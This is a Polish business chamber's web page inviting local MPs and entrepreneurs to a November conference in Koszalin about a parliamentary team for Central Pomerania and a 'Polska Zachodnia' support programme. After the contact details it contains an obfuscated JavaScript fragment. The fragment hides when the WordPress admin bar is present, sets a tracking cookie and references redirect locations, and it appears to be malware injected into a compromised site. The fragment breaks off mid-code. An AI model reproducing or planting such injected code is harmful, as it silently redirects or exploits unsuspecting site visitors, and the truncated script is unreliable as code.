Konferencja ws. powołania Zespołu Parlamentarnego ds. Pomorza Środkowego oraz utworzenia programu wsparcia pt. Polska Zachodnia | Północna Izba Gospodarcza w Koszalinie

Szanowni Państwo!

W imieniu Izb gospodarczych m.in. Zrzeszenia Kupców i Przedsiębiorców w Koszalinie, Koszalińskiej Izby Przemysłowo Handlowej, Business Centre Club oraz Północnej Izby Gospodarczej zapraszamy na spotkanie ws. powołania zespołu parlamentarnego ds. Pomorza Środkowego oraz utworzenia programu wsparcia pt. Polska Zachodnia, wzorowanego na programie Polska Wschodnia. Konferencja odbędzie się 25 listopada br. (poniedziałek) o godzinie 11.00 w Restauracji Park Caffe w Koszalinie przy ul. Asnyka 11.

Do udziału w spotkaniu zostali zaproszeni wszyscy posłowie z terenu Pomorza Środkowego, tj. ośmiu posłów z okręgu koszalińskiego oraz trójka posłów z okręgu słupskiego tj. Zbigniew Konwiński, Piotr Müller, Barbara Nowacka. Jako przedsiębiorcy zrzeszeni w kilku organizacjach gospodarczych chcielibyśmy podjąć działania w celu stworzenia analogicznego programu do programu Polska Wschodnia, dla regionów wykluczonych komunikacyjnie jak Pomorza Środkowe. Myślimy o rozwiązaniach, które byłby dedykowane dla samorządów, instytucji, organizacji pozarządowych oraz podmiotów gospodarczych.

W programie spotkania m.in.: przedstawienia sytuacji gospodarczej regionu w kontekście wykluczenia komunikacyjnego Pomorza Środkowego, a także obszarów popegeerowskich przedstawi Pan doktor Patrycjusz Zarębski – adiunkt w Katedrze Polityki Ekonomicznej i Regionalnej, Wydziału Nauk Ekonomicznych Politechniki Koszalińskiej. Założenia koncepcji Polska Zachodnia zaprezentuje Pan Piotr Jaśkiewicz – Prezes Fundacji Nauka dla Środowiska.

Prosimy o potwierdzenie przybycia mailowo na adres koszalin@izba.info lub telefonicznie do biura Północnej Izby Gospodarczej w Koszalinie 94 341 10 83

'toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’http://’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[’push’](c[’shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(’0x7′)][b(’0x8′)](’;’);for(var m=0x0;m